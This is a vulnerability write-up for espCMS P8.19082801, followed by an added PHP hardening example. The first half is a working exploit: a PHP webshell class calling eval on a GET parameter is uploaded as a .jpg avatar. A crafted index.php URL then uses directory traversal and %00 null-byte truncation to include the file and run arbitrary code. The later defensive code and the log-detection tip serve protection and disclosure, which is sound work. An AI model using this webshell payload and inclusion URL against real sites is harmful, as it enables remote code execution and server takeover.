author: naiquan chai
Net name: Hanamizuki花水木
Through this vulnerability, anyone with sufficient privilege (a user account that can upload an avatar) can obtain a webshell.
Exploitation requires a server-side PHP version < 5.3.4.
Demo
First enter the user module, then modify the user's avatar. Upload a file with the .jpg suffix whose content is:

```php
<?php
class test{
    public static function in_test(){
        eval($_GET['a']);
    }
}
?>
```
The upload succeeds. The stored path can be read from the web page source code.
Then go to the main page and pass in
"index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;"
The page outputs 1.
Source code analysis
espCMS_web/espCMS_load.php:
Here the ac parameter selects the file to include, and the at parameter selects the class whose method is executed.
Tracing the functions espCMS_get_ac() and espCMS_get_at():
Neither function filters user input at all, so the ac parameter can traverse directories, which results in arbitrary file inclusion.
However, in espCMS_web/espCMS_load.php the ac parameter is automatically followed by a .php suffix.
Null-byte truncation (%00) bypasses the appended suffix; this requires PHP version < 5.3.4.
Final exp
index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;
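The loader pattern analysed above (a client-supplied ac value joined to a .php suffix and included without filtering) can be hardened as follows. This is an added example, not espCMS's own code; the action names, the actions/ directory and the function resolveActionFile() are assumptions.

```php
<?php
// Added hardening example (not espCMS code). Assumed layout: one file per
// action under actions/, e.g. actions/index.php, actions/user.php.
declare(strict_types=1);

// Allow-list of action names that may be included; anything else is rejected.
const ALLOWED_ACTIONS = ['index', 'user', 'article'];

function resolveActionFile(string $baseDir, string $ac): ?string
{
    // Reject null bytes outright: on PHP < 5.3.4 a %00 in the path truncated
    // the appended ".php" suffix. Checking explicitly also lets us log it.
    if (strpos($ac, "\0") !== false) {
        return null;
    }
    // Only bare identifiers: no slashes, no dots, so no "../" traversal.
    if (!preg_match('/^[a-z0-9_]+$/', $ac)) {
        return null;
    }
    if (!in_array($ac, ALLOWED_ACTIONS, true)) {
        return null;
    }
    // Defense in depth: the resolved path must stay under the actions directory,
    // even if the allow-list above is edited carelessly later.
    $path = realpath($baseDir . '/' . $ac . '.php');
    $root = realpath($baseDir);
    if ($path === false || $root === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage: refuse the request instead of including whatever the client asked for.
// The at (class name) parameter should get the same allow-list treatment.
$ac = (isset($_GET['ac']) && is_string($_GET['ac'])) ? $_GET['ac'] : 'index';
$file = resolveActionFile(__DIR__ . '/actions', $ac);
if ($file === null) {
    // hex-encode so a null byte or traversal attempt is visible in the log
    error_log('rejected ac parameter: ' . bin2hex($ac));
    http_response_code(400);
    exit;
}
require $file;
```

The rejected-request log line is also a useful detection point: a rejected value containing 00 or 2e2e2f (../) in hex indicates an inclusion attempt against this loader.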
Summary: the above is the full write-up of the espcms P8.19082801 vulnerability as collected by 内存溢出.